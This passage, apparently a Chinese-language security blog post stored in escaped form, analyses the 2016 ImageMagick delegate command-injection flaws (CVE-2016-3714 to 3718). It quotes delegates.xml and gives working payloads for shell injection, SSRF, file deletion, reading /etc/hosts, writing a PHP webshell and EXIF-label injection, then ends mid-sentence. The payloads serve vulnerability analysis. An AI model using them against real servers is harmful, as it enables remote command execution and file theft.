<delegate decode=\"pcl:cmyk\" stealth=\"True\" command=\"&quot;pcl6&quot; -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pamcmyk32&quot; -dTextAlphaBits=%u -dGraphicsAlphaBits=%u &quot;-r%s&quot; %s &quot;-sOutputFile=%s&quot; &quot;%s&quot;\"/>\r\n <delegate decode=\"pcl:mono\" stealth=\"True\" command=\"&quot;pcl6&quot; -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pbmraw&quot; -dTextAlphaBits=%u -dGraphicsAlphaBits=%u &quot;-r%s&quot; %s &quot;-sOutputFile=%s&quot; &quot;%s&quot;\"/>\r\n <delegate decode=\"pdf\" encode=\"eps\" mode=\"bi\" command=\"&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=epswrite&quot; &quot;-sOutputFile=%o&quot; &quot;-f%i&quot;\"/>\r\n <delegate decode=\"pdf\" encode=\"ps\" mode=\"bi\" command=\"&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=nodevice&quot; &quot;-sOutputFile=%o&quot; &quot;-f%i&quot;\"/>\r\n <delegate decode=\"tiff\" encode=\"launch\" mode=\"encode\" command=\"&quot;gimp&quot; &quot;%i&quot;\"/>\r\n <delegate decode=\"pnm\" encode=\"ilbm\" mode=\"encode\" command=\"&quot;ppmtoilbm&quot; -24if &quot;%i&quot; &gt; &quot;%o&quot;\"/>\r\n <delegate decode=\"pov\" command=\"&quot;povray&quot; &quot;+i%i&quot; -D0 &quot;+o%o&quot; +fn%q +w%w +h%h +a -q9 &quot;-kfi%s&quot; &quot;-kff%n&quot;;&quot;convert&quot; -concatenate &quot;%o*.png&quot; &quot;%o&quot;\"/>\r\n <delegate decode=\"ps\" encode=\"eps\" mode=\"bi\" command=\"&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=epswrite&quot; &quot;-sOutputFile=%o&quot; &quot;-f%i&quot;\"/>\r\n <delegate decode=\"ps\" encode=\"pdf\" mode=\"bi\" command=\"&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pdfwrite&quot; &quot;-sOutputFile=%o&quot; &quot;-f%i&quot;\"/>\r\n <delegate decode=\"ps\" encode=\"print\" mode=\"encode\" command=\"lpr &quot;%i&quot;\"/>\r\n <delegate decode=\"ps:alpha\" stealth=\"True\" command=\"&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=%u -dGraphicsAlphaBits=%u &quot;-r%s&quot; %s &quot;-sOutputFile=%s&quot; &quot;-f%s&quot; &quot;-f%s&quot;\"/>\r\n <delegate decode=\"ps:cmyk\" stealth=\"True\" command=\"&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pam&quot; -dTextAlphaBits=%u -dGraphicsAlphaBits=%u &quot;-r%s&quot; %s &quot;-sOutputFile=%s&quot; &quot;-f%s&quot; &quot;-f%s&quot;\"/>\r\n <delegate decode=\"ps:color\" stealth=\"True\" command=\"&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pnmraw&quot; -dTextAlphaBits=%u -dGraphicsAlphaBits=%u &quot;-r%s&quot; %s &quot;-sOutputFile=%s&quot; &quot;-f%s&quot; &quot;-f%s&quot;\"/>\r\n <delegate decode=\"ps:mono\" stealth=\"True\" command=\"&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pbmraw&quot; -dTextAlphaBits=%u -dGraphicsAlphaBits=%u &quot;-r%s&quot; %s &quot;-sOutputFile=%s&quot; &quot;-f%s&quot; &quot;-f%s&quot;\"/>\r\n <delegate decode=\"rgba\" encode=\"rle\" mode=\"encode\" command=\"&quot;rawtorle&quot; -o &quot;%o&quot; -v &quot;%i&quot;\"/>\r\n <delegate decode=\"scan\" command=\"&quot;scanimage&quot; -d &quot;%i&quot; &gt; &quot;%o&quot;\"/>\r\n <delegate decode=\"scanx\" command=\"&quot;scanimage&quot; &gt; &quot;%o&quot;\"/>\r\n <delegate decode=\"miff\" encode=\"show\" spawn=\"True\" command=\"&quot;/usr/bin/display&quot; -delay 0 -window-group %[group] -title &quot;%l &quot; &quot;ephemeral:%i&quot;\"/>\r\n <delegate decode=\"shtml\" command=\"&quot;html2ps&quot; -U -o &quot;%o&quot; &quot;%i&quot;\"/>\r\n <delegate decode=\"svg\" command=\"&quot;rsvg-convert&quot; -o &quot;%o&quot; &quot;%i&quot;\"/>\r\n <delegate decode=\"txt\" encode=\"ps\" mode=\"bi\" command=\"&quot;enscript&quot; -o &quot;%o&quot; &quot;%i&quot;\"/>\r\n <delegate decode=\"miff\" encode=\"win\" stealth=\"True\" spawn=\"True\" command=\"&quot;/usr/bin/display&quot; -immutable -delay 0 -window-group %[group] -title &quot;%l &quot; &quot;ephemeral:%i&quot;\"/>\r\n <delegate decode=\"wmf\" command=\"&quot;wmf2eps&quot; -o &quot;%o&quot; &quot;%i&quot;\"/>\r\n <delegate decode=\"xps:color\" stealth=\"True\" command=\"&quot;gxps&quot; -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=ppmraw&quot; -dTextAlphaBits=%u -dGraphicsAlphaBits=%u &quot;-r%s&quot; %s &quot;-sOutputFile=%s&quot; &quot;%s&quot;\"/>\r\n <delegate decode=\"xps:cmyk\" stealth=\"True\" command=\"&quot;gxps&quot; -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=bmpsep8&quot; -dTextAlphaBits=%u -dGraphicsAlphaBits=%u &quot;-r%s&quot; %s &quot;-sOutputFile=%s&quot; &quot;%s&quot;\"/>\r\n <delegate decode=\"xps:mono\" stealth=\"True\" command=\"&quot;gxps&quot; -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pbmraw&quot; -dTextAlphaBits=%u -dGraphicsAlphaBits=%u &quot;-r%s&quot; %s &quot;-sOutputFile=%s&quot; &quot;%s&quot;\"/>\r\n</delegatemap>\r\n```\r\n\r\n\u6211\u4eec\u53ef\u4ee5\u770b\u5230\uff0c\u8fd9\u91cc\u5b83\u5b9a\u4e49\u4e86\u5f88\u591a\u5360\u4f4d\u7b26\uff0c\u6bd4\u5982%i\u662f\u8f93\u5165\u7684\u6587\u4ef6\u540d\uff0c%l\u662f\u56fe\u7247exif label\u4fe1\u606f\u3002\u800c\u5728\u540e\u9762command\u7684\u4f4d\u7f6e\uff0c%i\u548c%l\u7b49\u5360\u4f4d\u7b26\u88ab\u62fc\u63a5\u5728\u547d\u4ee4\u884c\u4e2d\u3002\u8fd9\u4e2a\u6f0f\u6d1e\u4e5f\u56e0\u6b64\u800c\u6765\uff0c\u88ab\u62fc\u63a5\u5b8c\u6bd5\u7684\u547d\u4ee4\u884c\u4f20\u5165\u4e86\u7cfb\u7edf\u7684system\u51fd\u6570\uff0c\u800c\u6211\u4eec\u53ea\u9700\u4f7f\u7528\u53cd\u5f15\u53f7\uff08`\uff09\u6216\u95ed\u5408\u53cc\u5f15\u53f7\uff0c\u6765\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\r\n\r\n\u6f0f\u6d1e\u62a5\u544a\u4e2d\u7ed9\u51fa\u7684POC\u662f\u5229\u7528\u4e86\u5982\u4e0b\u7684\u8fd9\u4e2a\u59d4\u6258\uff1a\r\n\r\n```\r\n<delegate decode=\"https\" command=\"&quot;curl&quot; -s -k -o &quot;%o&quot; &quot;https:%M&quot;\"/>\r\n```\r\n\r\n\u5b83\u5728\u89e3\u6790https\u56fe\u7247\u7684\u65f6\u5019\uff0c\u4f7f\u7528\u4e86curl\u547d\u4ee4\u5c06\u5176\u4e0b\u8f7d\uff0c\u6211\u4eec\u770b\u5230%M\u88ab\u76f4\u63a5\u653e\u5728curl\u7684\u6700\u540e\u4e00\u4e2a\u53c2\u6570\u5185\u3002ImageMagick\u9ed8\u8ba4\u652f\u6301\u4e00\u79cd\u56fe\u7247\u683c\u5f0f\uff0c\u53ebmvg\uff0c\u800cmvg\u4e0esvg\u683c\u5f0f\u7c7b\u4f3c\uff0c\u5176\u4e2d\u662f\u4ee5\u6587\u672c\u5f62\u5f0f\u5199\u5165\u77e2\u91cf\u56fe\u7684\u5185\u5bb9\uff0c\u800c\u8fd9\u5176\u4e2d\u5c31\u53ef\u4ee5\u5305\u542bhttps\u5904\u7406\u8fc7\u7a0b\u3002\r\n\r\n\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u6784\u9020\u4e00\u4e2a.mvg\u683c\u5f0f\u7684\u56fe\u7247\uff08\u4f46\u6587\u4ef6\u540d\u53ef\u4ee5\u4e0d\u4e3a.mvg\uff0c\u6bd4\u5982\u4e0b\u56fe\u4e2d\u5305\u542bpayload\u7684\u6587\u4ef6\u7684\u6587\u4ef6\u540d\u4e3avul.gif\uff0c\u800cImageMagick\u4f1a\u6839\u636e\u5176\u5185\u5bb9\u8bc6\u522b\u4e3amvg\u56fe\u7247\uff09\uff0c\u5e76\u5728`https://`\u540e\u9762\u95ed\u5408\u53cc\u5f15\u53f7\uff0c\u5199\u5165\u81ea\u5df1\u8981\u6267\u884c\u7684\u547d\u4ee4\uff1a\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(https://\"|id; \")'\r\npop graphic-context\r\n```\r\n\u8fd9\u6837\uff0cImageMagick\u5728\u6b63\u5e38\u6267\u884c\u56fe\u7247\u8f6c\u6362\u3001\u5904\u7406\u7684\u65f6\u5019\u5c31\u4f1a\u89e6\u53d1\u6f0f\u6d1e\uff1a\r\n\r\n\r\n\r\n\u5176\u4ed6\u51e0\u4e2aCVE\u4e5f\u6bd4\u8f83\u6709\u8da3\uff0c\u6bd4\u5982CVE-2016-3718\uff0c\u4ed6\u662f\u5229\u7528mvg\u683c\u5f0f\u4e2d\u53ef\u4ee5\u5305\u542burl\u7684\u7279\u70b9\uff0c\u8fdb\u884cSSRF\u653b\u51fb\uff0cPOC\u5982\u4e0b\uff1a\r\n\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(http://example.com/)'\r\npop graphic-context\r\n```\r\n\r\nCVE-2016-3715\u662f\u5229\u7528ImageMagick\u652f\u6301\u7684ephemeral\u534f\u8bae\uff0c\u6765\u5220\u9664\u4efb\u610f\u6587\u4ef6\uff1a\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'ephemeral:/tmp/delete.txt'\r\npopgraphic-context\r\n```\r\n\r\nCVE-2016-3716\u662f\u5229\u7528ImageMagick\u652f\u6301\u7684msl\u534f\u8bae\uff0c\u6765\u8fdb\u884c\u6587\u4ef6\u7684\u8bfb\u53d6\u548c\u5199\u5165\u3002\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u5c06\u4efb\u610f\u6587\u4ef6\u5199\u4e3a\u4efb\u610f\u6587\u4ef6\uff0c\u6bd4\u5982\u5c06\u56fe\u7247\u5199\u4e3a\u4e00\u4e2a.php\u540e\u7f00\u7684webshell\u3002\r\n\r\n\u7279\u522b\u8bf4\u660e\u7684\u662f\uff0cmsl\u534f\u8bae\u662f\u8bfb\u53d6\u4e00\u4e2amsl\u683c\u5f0f\u7684xml\u6587\u4ef6\uff0c\u5e76\u6839\u636e\u5176\u5185\u5bb9\u6267\u884c\u4e00\u4e9b\u64cd\u4f5c\uff1a\r\n\r\n```\r\nfile_move.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'msl:/tmp/msl.txt'\r\npopgraphic-context\r\n\r\n/tmp/msl.txt\r\n-=-=-=-=-=-=-=-=-\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<image>\r\n<read filename=\"/tmp/image.gif\" />\r\n<write filename=\"/var/www/shell.php\" />\r\n</image>\r\n```\r\n\r\nCVE-2016-3717\u53ef\u4ee5\u9020\u6210\u672c\u5730\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\uff1a\r\n\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'label:@/etc/hosts'\r\npop graphic-context\r\n```\r\n\r\n### 0x02 \u6df1\u5165\u5206\u6790\r\n\u9664\u4e86\u62a5\u544a\u4e2d\u7ed9\u51fa\u7684POC\u4ee5\u5916\uff0c\u5404\u4e2a\u5b89\u5168\u7814\u7a76\u4eba\u5458\u4e5f\u96c6\u601d\u5e7f\u76ca\uff0c\u53d1\u73b0\u8fd9\u4e2a\u6d1e\u7684\u66f4\u591a\u5229\u7528/\u5f71\u54cd\u65b9\u5f0f\u3002\r\n\r\n\u9996\u5148\uff0cPHP\u6269\u5c55\u300eImageMagick\u300f\u4e5f\u5b58\u5728\u8fd9\u4e2a\u95ee\u9898\uff0c\u800c\u4e14\u53ea\u9700\u8981\u8c03\u7528\u4e86Imagick\u7c7b\u7684\u6784\u9020\u65b9\u6cd5\uff0c\u5373\u53ef\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\uff1a\r\n\r\n```\r\n<?php\r\nnew Imagick('vul.gif');\r\n\r\n```\r\n\u56e0\u4e3a\u6ca1\u6709\u8fd4\u56de\u503c\uff0c\u6211\u5229\u7528cloudeye\u6355\u6349\u5230apache\u65e5\u5fd7\uff0c\u4ece\u65e5\u5fd7\u4e2d\u8bfb\u53d6\u547d\u4ee4\u6267\u884c\u7684\u7ed3\u679c\uff1a\r\n\r\n\r\n\r\n\u53e6\u5916\uff0c\u7ecf\u8fc7\u5206\u6790\uff0c\u7814\u7a76\u4eba\u5458\u53d1\u73b0\u9664\u4e86.mvg\u683c\u5f0f\u7684\u56fe\u7247\u4ee5\u5916\uff0c\u666e\u901apng\u683c\u5f0f\u7684\u56fe\u7247\u4e5f\u80fd\u89e6\u53d1\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u3002\u6211\u4eec\u770b\u5230\u524d\u9762\u59d4\u6258\u4e2d\u5bf9%l\uff0c\u4e5f\u5c31\u662fexif label\u7684\u5904\u7406\uff1a\r\n```\r\n<delegate decode=\"miff\" encode=\"show\" spawn=\"True\" command=\"&quot;/usr/bin/display&quot; -delay 0 -window-group %[group] -title &quot;%l &quot; &quot;ephemeral:%i&quot;\"/>\r\n```\r\n\u5b83\u5c06%l\u62fc\u63a5\u8fdb\u5165\u4e86/usr/bin/display\u547d\u4ee4\u4e2d\uff0c\u6240\u4ee5\u6211\u53ea\u9700\u5c06\u6b63\u5e38\u7684png\u56fe\u7247\uff0c\u5e26\u4e0a\u4e00\u4e2a\u300e\u6076\u610f\u300f\u7684exif\u4fe1\u606f\u3002\u5728\u8c03\u7528ImageMagick\u5c06\u5176\u5904\u7406\u6210.show\u6587\u4ef6\u7684\u65f6\u5019\uff0c\u5373\u53ef\u89e6\u53d1\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\uff1a\r\n\r\n```\r\nexiftool -label=\"\\\"|/usr/bin/id; \\\"\" test.png\r\nconvert test.png o.show\r\n```\r\n\r\n\r\n\u4f46\u8fd9\u4e2a\u65b9\u6cd5\u9e21\u808b\u4e4b\u5904\u5728\u4e8e\uff0c\u56e0\u4e3adelegate.xml\u4e2d\u914d\u7f6e\u7684encode=\"show\"\uff08\u6216\"win\"\uff09\uff0c\u6240\u4ee5\u53ea\u6709\u8f93\u51fa\u4e3a.show\u6216.win\u683c\u5f0f\u7684\u60c5\u51b5\u4e0b\u624d\u4f1a\u8c03\u7528\u8fd9\u4e2a\u59d4\u6258\uff0c\u800c\u666e\u901a\u7684\u6587\u4ef6\u5904\u7406\u662f\u4e0d\u4f1a\u89e6\u53d1\u8fd9\u4e2a\u547d\u4ee4\u7684\u3002\r\n\r\n### 0x03 \u5f71\u54cd\u5206\u6790\r\n\r\nImageMagick\u662f\u4e00\u4e2a\u4f7f\u7528\u975e\u5e38\u5e7f\u7684\u7ec4\u4ef6\uff0c\u5927\u91cf\u5382\u5546\u90fd\u5728\u5904\u7406\u56fe\u7247\u7684\u65f6\u5019\u8c03\u7528\u8fd9\u4e2a\u7a0b\u5e8f\u8fdb\u884c\u5904\u7406\uff0c\u800c\u4e14\u5f88\u591a\u5f00\u6e90\u5e94\u7528\u4e5f\u5728\u6838\u5fc3\u4ee3\u7801\u4e2d\u5305\u542b\u4e86ImageMagick\u9009\u9879\u3002\r\n\r\nWordpress\u662f\u8457\u540d\u7684\u4e2a\u4eba\u535a\u5ba2/CMS\u5382\u5546\uff0c\u5176\u6838\u5fc3\u6e90\u7801\u4e2d\u4f7f\u7528\u4e86PHP\u6269\u5c55ImageMagick\u3002\u53d7\u5230\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u5f71\u54cd\uff0c\u5728\u653b\u51fb\u8005\u62e5\u6709\u4e00\u5b9a\u6743\u9650\u7684\u60c5\u51b5\u4e0b\uff0c\u53ef\u4ee5\u5728Wordpress\u4e2d\u89e6\u53d1\u4efb\u610f\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff1a [WooYun: Wordpress\u67d0\u6838\u5fc3\u529f\u80fd\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff08\u4e00\u5b9a\u6743\u9650\uff09](http://www.wooyun.org/bugs/wooyun-2016-0205047)\r\n\r\n\u540c\u6837\u7684\uff0cDiscuz\u3001Drupal\u7b49\u5e38\u7528CMS\u4e2d\u4e5f\u8c03\u7528\u4e86ImageMagick\u6269\u5c55\u6216ImageMagick\u5e93\uff0cCVE-2016-3714\u4e5f\u53ef\u80fd\u4f1a\u5f71\u54cd\u5230\u4ed6\u4eec\u3002\r\n\r\n\u4f46\u6839\u636e\u6211\u5bf9Discuz\u7684\u5206\u6790\uff0c\u5176\u8c03\u7528ImageMagick\u5904\u7406\u56fe\u7247\u4e4b\u524d\uff0c\u4f1a\u5148\u4f7f\u7528php\u7684getimagesize\u8fdb\u884c\u56fe\u7247\u683c\u5f0f\u3001\u5927\u5c0f\u7684\u9a8c\u8bc1\uff0c\u6240\u4ee5\u672c\u6587\u4e2d\u6240\u6d89\u53ca\u7684POC\u65e0\u6cd5\u5728Disucz\u4e2d\u76f4\u63a5\u4f7f\u7528\uff0c\u4f46\u4e0d\u6392\u9664\u6709\u5176\u4ed6\u65b9\u6cd5\u7ed5\u8fc7discuz\u5bf9\u8be5\u95ee\u9898\u7684\u9650\u5